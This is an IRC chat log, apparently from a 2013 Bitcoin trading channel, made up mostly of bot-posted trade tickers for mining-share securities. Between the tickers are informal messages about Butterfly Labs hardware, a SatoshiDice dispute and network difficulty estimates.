[ASICMINER-PT] 1 @ 2.518 BTC [-] Jun 13 00:11:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] Jun 13 00:12:36 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00711 = 0.1422 BTC [-] Jun 13 00:12:45 [BTCTC] [ASICMINER-PT] 2 @ 2.519 = 5.038 BTC [+] Jun 13 00:13:08 [BTCTC] [ASICMINER-PT] 16 @ 2.52 = 40.32 BTC [+] Jun 13 00:13:15 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.0071 = 1.065 BTC [-] Jun 13 00:13:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.02552 = 0.051 BTC [+] Jun 13 00:13:58 [BTCTC] [TAT.VIRTUALMINE] 860 @ 0.007 = 6.02 BTC [-] Jun 13 00:15:30 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 00:16:36 [BTCTC] [TAT.ASICMINER] 28 @ 0.02552 = 0.7146 BTC [+] Jun 13 00:17:49 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [-] Jun 13 00:18:08 [BTCTC] [ASICMINER-PT] 1 @ 2.5045 BTC [-] Jun 13 00:18:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02552 = 0.051 BTC [+] Jun 13 00:18:29 [HAVELOCK] [ASICM] 61 @ 0.025 = 1.525 BTC [-] Jun 13 00:19:41 [HAVELOCK] [HIM] 2 @ 0.287 = 0.574 BTC [-] Jun 13 00:19:45 ;;estimate Jun 13 00:19:45 Next difficulty estimate | 19171996.906 based on data since last change | 20588091.6361 based on data for last three days Jun 13 00:19:49 [HAVELOCK] [ASICM] 7 @ 0.02509999 = 0.1757 BTC [+] Jun 13 00:19:56 heyo Jun 13 00:20:05 ;;nethash Jun 13 00:20:06 147377.549243 Jun 13 00:20:16 ;;bc,stats Jun 13 00:20:18 Current Blocks: 241190 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 729 blocks | Next Difficulty In About: 3 days, 17 hours, 15 minutes, and 55 seconds | Next Difficulty Estimate: 19171996.906 | Estimated Percent Change: 22.85306 Jun 13 00:21:24 [HAVELOCK] [ASICM] 22 @ 0.02509999 = 0.5522 BTC [+] Jun 13 00:21:47 [BTCTC] [S.MPOE-PT] 6 @ 0.000638 = 0.0038 BTC [+] Jun 13 00:23:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.02552 = 0.0766 BTC [+] Jun 13 00:24:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [+] Jun 13 00:25:08 [HAVELOCK] [ASICM] 2 @ 0.02509999 = 0.0502 BTC [+] Jun 13 00:25:31 [BTCTC] [TAT.ASICMINER] 28 @ 0.02552 = 0.7146 BTC [+] Jun 13 00:26:21 [BTCTC] [ASICMINER-PT] 2 @ 2.509 = 5.018 BTC [+] Jun 13 00:26:34 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] Jun 13 00:26:41 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Jun 13 00:26:44 [BTCTC] [ASICMINER-PT] 24 @ 2.502 = 60.048 BTC [-] Jun 13 00:26:51 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Jun 13 00:27:00 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] Jun 13 00:27:03 [BTCTC] [TAT.ASICMINER] 11 @ 0.02552 = 0.2807 BTC [+] Jun 13 00:27:50 https://forums.butterflylabs.com/announcements/3214-first-single-sc-60gh-s-has-left-building.html Jun 13 00:28:29 Chaaang-Noi: You only have one publicly. Yeah I know what you told me privately. Jun 13 00:29:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.02552 = 0.1531 BTC [+] Jun 13 00:31:05 [BTCTC] [DMS.PURCHASE] 100 @ 0.066163 = 6.6163 BTC [-] Jun 13 00:32:28 heh deprived really deadpanned it Jun 13 00:32:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.02551 = 0.1786 BTC [-] Jun 13 00:32:53 on sdice "announcement" Jun 13 00:33:02 [BTCTC] [S.MPOE-PT] 214 @ 0.000705 = 0.1509 BTC [+] Jun 13 00:33:06 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] Jun 13 00:34:31 if Deprived is capable of humor Jun 13 00:34:50 machines do not have emotion Jun 13 00:35:18 [BTCTC] [RSM] 2 @ 0.008068 = 0.0161 BTC [+] Jun 13 00:35:59 [HAVELOCK] [ASICM] 26 @ 0.02509999 = 0.6526 BTC [+] Jun 13 00:36:04 [HAVELOCK] [ASICM] 10 @ 0.02509999 = 0.251 BTC [+] Jun 13 00:36:26 are they personal? Jun 13 00:36:35 or simply cold? Jun 13 00:36:53 [MPEX] [S.MPOE] 5032 @ 0.00071882 = 3.6171 BTC [+] Jun 13 00:36:55 [MPEX] [S.MPOE] 15232 @ 0.00072076 = 10.9786 BTC [+] Jun 13 00:37:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.025251 = 0.1263 BTC [-] Jun 13 00:37:25 [HAVELOCK] [ASICM] 63 @ 0.02509999 = 1.5813 BTC [+] Jun 13 00:37:39 [HAVELOCK] [ASICM] 2 @ 0.02509999 = 0.0502 BTC [+] Jun 13 00:37:56 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 00:38:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.025251 = 0.0505 BTC [-] Jun 13 00:38:33 [BTCTC] [TAT.VIRTUALMINE] 360 @ 0.00725 = 2.61 BTC [+] Jun 13 00:39:28 [BTCTC] [TAT.ASICMINER] 29 @ 0.02525 = 0.7323 BTC [-] Jun 13 00:39:40 it wasn't humorous per se, but so apt that i chuckled Jun 13 00:39:52 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00739 = 0.037 BTC [+] Jun 13 00:40:38 [HAVELOCK] [VTX] 1 @ 0.475 BTC [+] Jun 13 00:42:12 [BTCTC] [TAT.ASICMINER] 18 @ 0.02525 = 0.4545 BTC [-] Jun 13 00:42:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.0251 = 0.251 BTC [-] Jun 13 00:42:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02501 = 0.05 BTC [-] Jun 13 00:42:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] Jun 13 00:42:47 i dunno, something back to glbse days Jun 13 00:42:56 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [-] Jun 13 00:42:59 [HAVELOCK] [ASICM] 4 @ 0.02509999 = 0.1004 BTC [+] Jun 13 00:43:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 13 00:43:35 [BTCTC] [TAT.ASICMINER] 45 @ 0.025 = 1.125 BTC [-] Jun 13 00:43:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] Jun 13 00:44:10 [BTCTC] [DMS.PURCHASE] 852 @ 0.066163 = 56.3709 BTC [-] Jun 13 00:44:39 jborkl now that's interesting. Jun 13 00:44:50 [MPEX] [S.MPOE] 568 @ 0.00072076 = 0.4094 BTC [+] Jun 13 00:44:54 [HAVELOCK] [ASICM] 3 @ 0.02509999 = 0.0753 BTC [+] Jun 13 00:45:02 "Invalid Thread specified. If you followed a valid link, please notify the administrator" Jun 13 00:45:05 am i too late ? Jun 13 00:45:39 the BFL link? Jun 13 00:46:03 yep Jun 13 00:46:08 looks like they deleted it Jun 13 00:46:19 lol so did it or didn'ty it leave the building Jun 13 00:46:23 right after i posted it in the AM thread Jun 13 00:46:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] Jun 13 00:46:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.024999 = 0.175 BTC [-] Jun 13 00:46:35 it was a first unit for guess who Jun 13 00:46:39 [BTCTC] [TAT.ASICMINER] 7 @ 0.02491 = 0.1744 BTC [-] Jun 13 00:46:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.024903 = 0.2988 BTC [-] Jun 13 00:46:44 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 13 00:46:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 13 00:47:10 Like-Jr Jun 13 00:47:15 Luke* Jun 13 00:47:20 [HAVELOCK] [ASICM] 5 @ 0.02509999 = 0.1255 BTC [+] Jun 13 00:47:28 Josh laser-engraved the serial # on it Jun 13 00:47:35 "1337" Jun 13 00:47:54 it shipped out 5pm yesterday Jun 13 00:47:59 thats the whole story Jun 13 00:48:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 13 00:48:38 no homo Jun 13 00:48:48 [HAVELOCK] [HIM] 42 @ 0.2815 = 11.823 BTC [-] Jun 13 00:51:41 Hi, Billy Mays here with the new laser engraver writing easily and comfortably 1337 on any chip surface. Jun 13 00:52:20 Billy died from snorting too much coke Jun 13 00:52:35 true story Jun 13 00:52:35 BFL "As seen on TV" Jun 13 00:52:52 [HAVELOCK] [ASICM] 5 @ 0.02509999 = 0.1255 BTC [+] Jun 13 00:53:15 when BFL starts having infomecials, saying in only 6-8 weeks you too can have mah bitcoins Jun 13 00:53:15 yup. Jun 13 00:53:26 it is all fucked Jun 13 00:53:40 [BTCTC] [DMS.MINING] 68 @ 0.030001 = 2.0401 BTC [-] Jun 13 00:53:47 [BTCTC] [DMS.MINING] 432 @ 0.03 = 12.96 BTC [-] Jun 13 00:54:28 [BTCTC] [DMS.PURCHASE] 200 @ 0.066163 = 13.2326 BTC [-] Jun 13 00:54:52 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] Jun 13 00:54:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.024903 BTC [-] Jun 13 00:55:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.0252 = 0.0756 BTC [+] Jun 13 00:55:52 [BTCTC] [TAT.ASICMINER] 22 @ 0.0252 = 0.5544 BTC [+] Jun 13 00:57:36 [BTCTC] [DMS.MINING] 1 @ 0.032 BTC [+] Jun 13 00:59:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.0252 = 0.0756 BTC [+] Jun 13 01:00:27 [BTCTC] [DMS.PURCHASE] 10 @ 0.066163 = 0.6616 BTC [-] Jun 13 01:00:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.025199 BTC [-] Jun 13 01:00:39 btw ThickAsThieves, i can't help realizing how well timed was my TAT.VIRTUALDICE proposal :D Jun 13 01:00:58 no betting pool, no admin salary hassle Jun 13 01:01:20 lol Jun 13 01:01:21 [HAVELOCK] [VTX] 2 @ 0.4789 = 0.9578 BTC [+] Jun 13 01:02:15 hehe Jun 13 01:02:58 i forgot about that conversation Jun 13 01:03:18 i meant to dwell more on the concept of assets-as-gambling Jun 13 01:06:19 [BTCTC] [S.DICE-PT] 48 @ 0.002888 = 0.1386 BTC [+] Jun 13 01:06:20 [BTCTC] [DMS.SELLING] 10 @ 0.036 = 0.36 BTC [+] Jun 13 01:06:21 [BTCTC] [DMS.SELLING] 9 @ 0.0365 = 0.3285 BTC [+] Jun 13 01:11:25 [BTCTC] [TAT.ASICMINER] 49 @ 0.0252 = 1.2348 BTC [+] Jun 13 01:11:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0252 = 0.126 BTC [+] Jun 13 01:13:25 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 01:13:31 [BTCTC] [DMS.MINING] 61 @ 0.031998 = 1.9519 BTC [-] Jun 13 01:14:33 https://bitcointalk.org/index.php?topic=101902.msg2454839#msg2454839 lol@ this guy Jun 13 01:15:12 Erik fucked that up. I think he just needs to eat it. Jun 13 01:15:37 doesn't look like he thought things all the way through, no. Jun 13 01:15:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.025199 = 0.1512 BTC [-] Jun 13 01:15:47 but i was talking about eskimobob Jun 13 01:16:30 lol Jun 13 01:16:41 EskimoBob wants me to issue financial reports too Jun 13 01:16:47 for TAT.AM and TAT.VM Jun 13 01:16:55 I was like uhhh Jun 13 01:17:11 everything you need to know is already public Jun 13 01:17:22 he's a funny character. Jun 13 01:17:27 [HAVELOCK] [ASICM] 11 @ 0.02509999 = 0.2761 BTC [+] Jun 13 01:19:18 [BTCTC] [DMS.MINING] 6 @ 0.031998 = 0.192 BTC [-] Jun 13 01:19:34 http://safetycurrency.org wat Jun 13 01:19:42 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] Jun 13 01:21:05 [MPEX] [S.DICE] 3000 @ 0.0020602 = 6.1806 BTC [-] Jun 13 01:21:09 [MPEX] [S.DICE] 10000 @ 0.00206 = 20.6 BTC [-] Jun 13 01:21:14 [MPEX] [S.DICE] 2400 @ 0.002051 = 4.9224 BTC [-] Jun 13 01:21:16 [MPEX] [S.DICE] 900 @ 0.00205001 = 1.845 BTC [-] Jun 13 01:21:27 [MPEX] [S.DICE] 120 @ 0.00205 = 0.246 BTC [-] Jun 13 01:21:33 [MPEX] [S.DICE] 5000 @ 0.00200002 = 10.0001 BTC [-] Jun 13 01:21:41 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [-] Jun 13 01:21:51 I like how Erik says "Alright. This isn't worth the drama." Jun 13 01:21:55 [MPEX] [S.DICE] 29534 @ 0.002 = 59.068 BTC [-] Jun 13 01:22:02 6100btc is certainly worth a lil drama Jun 13 01:22:20 Generally speaking, the ease with which money is created almost defies logic. When you loan $100,000 from a bank, the bank simply types this amount into their computer and BOOM money is created. Jun 13 01:22:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.025199 = 0.126 BTC [-] Jun 13 01:22:21 and then proceeds to say he's gonna take the money anyway Jun 13 01:22:26 We can use this same logic to create money for the purpose of community abundance rather than company profits. Jun 13 01:22:28 "Popescu has exactly ZERO! real life experience in running a business. He also has no idea what financial reporting is and how it looks like. I bet he can not even read read a real report. No wonder, he invented some new "standard" that ended up screwing everyone who believed his crap." Jun 13 01:22:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02515 = 0.0503 BTC [-] Jun 13 01:22:53 someone can't write write Jun 13 01:22:55 [BTCTC] [TAT.ASICMINER] 22 @ 0.02515 = 0.5533 BTC [-] Jun 13 01:23:15 [MPEX] [S.DICE] 970466 @ 0.002 = 1940.932 BTC [-] Jun 13 01:23:24 [BTCTC] [TAT.VIRTUALMINE] 138 @ 0.00739 = 1.0198 BTC [+] Jun 13 01:23:25 [BTCTC] [TAT.VIRTUALMINE] 199 @ 0.00739 = 1.4706 BTC [+] Jun 13 01:23:26 heh Jun 13 01:24:17 [HAVELOCK] [ASICM] 10 @ 0.02509999 = 0.251 BTC [+] Jun 13 01:25:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.02515 = 0.4527 BTC [-] Jun 13 01:25:44 [BTCTC] [TAT.ASICMINER] 18 @ 0.0252 = 0.4536 BTC [+] Jun 13 01:25:46 [BTCTC] [TAT.ASICMINER] 15 @ 0.02525 = 0.3788 BTC [+] Jun 13 01:25:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.02525 = 0.1768 BTC [+] Jun 13 01:25:52 [BTCTC] [DMS.MINING] 22 @ 0.03 = 0.66 BTC [-] Jun 13 01:28:07 [BTCTC] [DMS.PURCHASE] 5 @ 0.066163 = 0.3308 BTC [-] Jun 13 01:31:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.02518 = 0.0755 BTC [-] Jun 13 01:31:19 dub you sound as if you wanted money to obey thermodynamic laws or something Jun 13 01:31:20 o hai Jun 13 01:31:35 au revoir Jun 13 01:31:40 :( Jun 13 01:31:53 sry, this is "goodbye"? Jun 13 01:32:26 hey davout Jun 13 01:32:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] Jun 13 01:32:37 how the exchange going Jun 13 01:32:39 jurov: oui Jun 13 01:32:39 how Jun 13 01:32:41 hows Jun 13 01:32:45 fuor fuck sake Jun 13 01:32:45 working on it Jun 13 01:32:49 lol Jun 13 01:33:20 well, to be completely honest, not right now, right now i'm having some popcorn while reading the SD thread Jun 13 01:33:28 :> Jun 13 01:33:44 [HAVELOCK] [ASICM] 86 @ 0.02509999 = 2.1586 BTC [+] Jun 13 01:34:13 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [+] Jun 13 01:34:30 it looks slightly messy :-) Jun 13 01:36:05 [MPEX] [S.MPOE] 4321 @ 0.00073088 = 3.1581 BTC [+] Jun 13 01:36:08 [MPEX] [S.MPOE] 129 @ 0.00073122 = 0.0943 BTC [+] Jun 13 01:36:53 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [+] Jun 13 01:37:58 [BTCTC] [ASICMINER-PT] 1 @ 2.516887 BTC [+] Jun 13 01:38:09 fuor lol Jun 13 01:38:20 !ticker m s.dice Jun 13 01:38:21 [MPEX:S.DICE] 1D: 0.002 / 0.00200093 / 0.0020602 (1022420 shares, 2,045.79 BTC), 7D: 0.002 / 0.00200655 / 0.00249793 (1036208 shares, 2,079.21 BTC), 30D: 0.00135 / 0.00204045 / 0.00329988 (1322312 shares, 2,698.11 BTC) Jun 13 01:38:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.02517 = 0.0755 BTC [+] Jun 13 01:38:41 seems somebody got pissed off. Jun 13 01:39:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.02517 = 0.2517 BTC [+] Jun 13 01:41:21 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0073 = 0.0146 BTC [-] Jun 13 01:41:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0072 = 0.072 BTC [-] Jun 13 01:41:27 [BTCTC] [TAT.VIRTUALMINE] 690 @ 0.0072 = 4.968 BTC [-] Jun 13 01:41:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.02517 = 0.0755 BTC [+] Jun 13 01:42:22 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 01:43:03 [HAVELOCK] [ASICM] 10 @ 0.02509999 = 0.251 BTC [+] Jun 13 01:43:18 [BTCTC] [TAT.ASICMINER] 6 @ 0.02517 = 0.151 BTC [+] Jun 13 01:44:57 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 01:45:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.02517 = 0.1007 BTC [+] Jun 13 01:48:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.02517 = 0.3272 BTC [+] Jun 13 01:48:17 this thread was like a short disney movie, all ends well and love prevails Jun 13 01:49:04 [BTCTC] [TAT.ASICMINER] 11 @ 0.02517 = 0.2769 BTC [+] Jun 13 01:49:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.025198 = 0.0756 BTC [+] Jun 13 01:49:59 [BTCTC] [ASICMINER-PT] 1 @ 2.516889 BTC [+] Jun 13 01:50:19 Wow touched 0.00135? Hehe Jun 13 01:51:03 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 01:51:33 davout, i doubt. did he say how he's going to solve this self-inflicted situation? Jun 13 01:51:45 yes Jun 13 01:52:04 he's swallowing it Jun 13 01:52:38 ic Jun 13 01:53:33 but the contract is vague enough for such an expense to be accounted for as a legitimate expense Jun 13 01:53:58 if you understand "development" as "not necessarily technical development" Jun 13 01:54:05 anyway Jun 13 01:54:48 anyway it was good to up the maxbet at this time Jun 13 01:55:33 howso? Jun 13 01:55:47 'developing' erik's hooker and blow collection Jun 13 01:56:14 [BTCTC] [TAT.ASICMINER] 7 @ 0.025197 = 0.1764 BTC [-] Jun 13 01:56:48 [BTCTC] [ASICMINER-PT] 1 @ 2.516889 BTC [+] Jun 13 01:56:51 its ended well for everyon eexcept dice shareholders Jun 13 01:57:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.025198 = 0.1764 BTC [+] Jun 13 01:57:51 [BTCTC] [ASICMINER-PT] 1 @ 2.516889 BTC [+] Jun 13 01:58:59 [HAVELOCK] [ASICM] 12 @ 0.02509999 = 0.3012 BTC [+] Jun 13 01:59:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.025198 = 0.0756 BTC [+] Jun 13 02:00:48 dub: i guess if you look at the net result for SD being a reduced pool you can see it like that Jun 13 02:00:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.025198 = 0.2016 BTC [+] Jun 13 02:04:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.025198 = 0.0504 BTC [+] Jun 13 02:06:17 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [+] Jun 13 02:07:59 [HAVELOCK] [ASICM] 2 @ 0.02509999 = 0.0502 BTC [+] Jun 13 02:08:37 [BTCTC] [DMS.MINING] 27 @ 0.031997 = 0.8639 BTC [+] Jun 13 02:10:14 [BTCTC] [DMS.PURCHASE] 400 @ 0.066163 = 26.4652 BTC [-] Jun 13 02:11:03 [HAVELOCK] [ASICM] 3 @ 0.02509999 = 0.0753 BTC [+] Jun 13 02:11:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.025198 = 0.2772 BTC [+] Jun 13 02:11:07 [MPEX] [S.MPOE] 4321 @ 0.00073116 = 3.1593 BTC [-] Jun 13 02:11:08 [MPEX] [S.MPOE] 4324 @ 0.00073122 = 3.1618 BTC [+] Jun 13 02:11:11 [MPEX] [S.MPOE] 5955 @ 0.00073123 = 4.3545 BTC [+] Jun 13 02:11:49 G0X and 24 others retweeted you 3h Jun 13 02:11:50 da fuck Jun 13 02:11:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.025198 = 0.1512 BTC [+] Jun 13 02:13:44 [BTCTC] [DMS.MINING] 1 @ 0.031 BTC [-] Jun 13 02:13:47 [BTCTC] [DMS.MINING] 53 @ 0.03 = 1.59 BTC [-] Jun 13 02:13:58 [BTCTC] [DMS.MINING] 27 @ 0.03 = 0.81 BTC [-] Jun 13 02:14:40 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [+] Jun 13 02:14:44 [BTCTC] [ASICMINER-PT] 1 @ 2.518 BTC [+] Jun 13 02:15:08 you twitter-famous now Jun 13 02:16:20 nah cause i had like 500 at some point in the past Jun 13 02:18:37 [HAVELOCK] [ASICM] 3 @ 0.0250999 = 0.0753 BTC [-] Jun 13 02:18:45 [HAVELOCK] [VTX] 1 @ 0.4779 BTC [-] Jun 13 02:18:47 Coinroll just went ahead of SD in amount of bets. Still far behind in BTC volume tho. Jun 13 02:20:41 [BTCTC] [TAT.ASICMINER] 25 @ 0.02524 = 0.631 BTC [+] Jun 13 02:20:52 turbo button ftw Jun 13 02:21:43 [BTCTC] [DMS.MINING] 4 @ 0.031996 = 0.128 BTC [+] Jun 13 02:22:04 That and no transaction fees. People can spam microbets. Jun 13 02:22:13 indeed Jun 13 02:22:38 too bad SDICE couldnt develop such a complicated feature Jun 13 02:22:56 must have too much coin tied up in loans Jun 13 02:24:42 I'm pretty sure SD has all it needs to get it working. Jun 13 02:26:14 [BTCTC] [TAT.ASICMINER] 78 @ 0.025 = 1.95 BTC [-] Jun 13 02:27:06 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [-] Jun 13 02:29:21 [BTCTC] [BASIC-MINING] 2 @ 0.66 = 1.32 BTC [-] Jun 13 02:30:25 http://i.imgur.com/5HdQbL0.jpg Jun 13 02:30:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02524 BTC [+] Jun 13 02:31:01 MOO Jun 13 02:31:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.02524 BTC [+] Jun 13 02:31:03 https://bitcointalk.org/index.php?topic=224745.msg2456585#msg2456585 lmao Jun 13 02:31:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.02524 = 0.1262 BTC [+] Jun 13 02:31:19 [BTCTC] [BTC-BOND] 49 @ 0.009993 = 0.4897 BTC [+] Jun 13 02:31:51 lol Jun 13 02:34:40 [MPEX] [S.MPOE] 7612 @ 0.00073077 = 5.5626 BTC [-] Jun 13 02:34:40 [MPEX] [S.MPOE] 4321 @ 0.000729 = 3.15 BTC [-] Jun 13 02:34:43 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 02:34:53 [MPEX] [S.MPOE] 8767 @ 0.00072871 = 6.3886 BTC [-] Jun 13 02:35:31 [HAVELOCK] [ASICM] 2 @ 0.02509999 = 0.0502 BTC [+] Jun 13 02:37:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00738 BTC [+] Jun 13 02:39:27 [HAVELOCK] [ASICM] 10 @ 0.02509999 = 0.251 BTC [+] Jun 13 02:40:22 [BTCTC] [BTC-BOND] 1 @ 0.009993 BTC [+] Jun 13 02:41:05 [BTCTC] [BTC-BOND] 1 @ 0.00986 BTC [-] Jun 13 02:41:24 [BTCTC] [BTC-BOND] 2 @ 0.00985 = 0.0197 BTC [-] Jun 13 02:41:50 [BTCTC] [BTC-BOND] 2 @ 0.00983 = 0.0197 BTC [-] Jun 13 02:42:36 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00738 = 0.059 BTC [+] Jun 13 02:44:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.02524 = 0.1262 BTC [+] Jun 13 02:46:06 [MPEX] [S.MPOE] 4895 @ 0.00073123 = 3.5794 BTC [+] Jun 13 02:46:34 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [-] Jun 13 02:46:44 [MPEX] [S.MPOE] 1305 @ 0.00073226 = 0.9556 BTC [+] Jun 13 02:48:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02524 BTC [+] Jun 13 02:49:35 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00738 = 0.0148 BTC [+] Jun 13 02:50:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02524 = 0.101 BTC [+] Jun 13 02:50:51 [MPEX] [S.MPOE] 2033 @ 0.00072871 = 1.4815 BTC [-] Jun 13 02:51:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [+] Jun 13 02:53:09 [BTCTC] [S.DICE-PT] 200 @ 0.002899 = 0.5798 BTC [+] Jun 13 02:59:23 [HAVELOCK] [ASICM] 78 @ 0.02502 = 1.9516 BTC [-] Jun 13 02:59:24 [HAVELOCK] [ASICM] 4 @ 0.02501 = 0.1 BTC [-] Jun 13 02:59:25 [HAVELOCK] [ASICM] 11 @ 0.02500001 = 0.275 BTC [-] Jun 13 02:59:27 [HAVELOCK] [ASICM] 82 @ 0.02500001 = 2.05 BTC [-] Jun 13 03:00:58 [BTCTC] [TAT.ASICMINER] 13 @ 0.025251 = 0.3283 BTC [+] Jun 13 03:01:02 [BTCTC] [TAT.ASICMINER] 36 @ 0.025251 = 0.909 BTC [+] Jun 13 03:05:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.02525 = 0.1515 BTC [-] Jun 13 03:06:20 [BTCTC] [DMS.MINING] 1 @ 0.03 BTC [-] Jun 13 03:06:23 [BTCTC] [DMS.MINING] 7 @ 0.03 = 0.21 BTC [-] Jun 13 03:07:35 [HAVELOCK] [ASICM] 2 @ 0.02509999 = 0.0502 BTC [+] Jun 13 03:13:46 [BTCTC] [ASICMINER-PT] 1 @ 2.508502 BTC [-] Jun 13 03:14:08 [BTCTC] [DMS.MINING] 4 @ 0.03059 = 0.1224 BTC [+] Jun 13 03:14:20 [BTCTC] [ASICMINER-PT] 1 @ 2.508501 BTC [-] Jun 13 03:14:45 [BTCTC] [ASICMINER-PT] 1 @ 2.5085 BTC [-] Jun 13 03:15:23 [BTCTC] [ASICMINER-PT] 1 @ 2.5053 BTC [-] Jun 13 03:16:01 [BTCTC] [TAT.ASICMINER] 16 @ 0.0251 = 0.4016 BTC [-] Jun 13 03:17:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.155 BTC [-] Jun 13 03:17:24 [BTCTC] [DMS.MINING] 115 @ 0.03059 = 3.5179 BTC [+] Jun 13 03:17:41 [BTCTC] [CRYPTO-TRADE] 10 @ 0.150001 = 1.5 BTC [-] Jun 13 03:17:58 [BTCTC] [CRYPTO-TRADE] 3 @ 0.15 = 0.45 BTC [-] Jun 13 03:18:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02525 = 0.0758 BTC [+] Jun 13 03:18:29 [BTCTC] [DMS.MINING] 25 @ 0.0306 = 0.765 BTC [+] Jun 13 03:18:31 [BTCTC] [DMS.MINING] 25 @ 0.0309 = 0.7725 BTC [+] Jun 13 03:18:32 [BTCTC] [DMS.MINING] 171 @ 0.031 = 5.301 BTC [+] Jun 13 03:18:59 [BTCTC] [DMS.MINING] 1 @ 0.031 BTC [+] Jun 13 03:21:06 [BTCTC] [COGNITIVE] 1 @ 0.276301 BTC [-] Jun 13 03:21:18 [BTCTC] [COGNITIVE] 1 @ 0.2763 BTC [-] Jun 13 03:22:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.02525 = 0.1263 BTC [+] Jun 13 03:23:01 [BTCTC] [COG.F] 1 @ 2.10101 BTC [-] Jun 13 03:23:12 [BTCTC] [COG.F] 1 @ 2.101 BTC [-] Jun 13 03:23:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.02525 = 0.101 BTC [+] Jun 13 03:23:15 [BTCTC] [TAT.ASICMINER] 26 @ 0.0251 = 0.6526 BTC [-] Jun 13 03:23:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Jun 13 03:24:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Jun 13 03:24:37 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [+] Jun 13 03:24:44 [HAVELOCK] [ASICM] 2 @ 0.02500003 = 0.05 BTC [-] Jun 13 03:26:07 [BTCTC] [TAT.ASICMINER] 1 @ 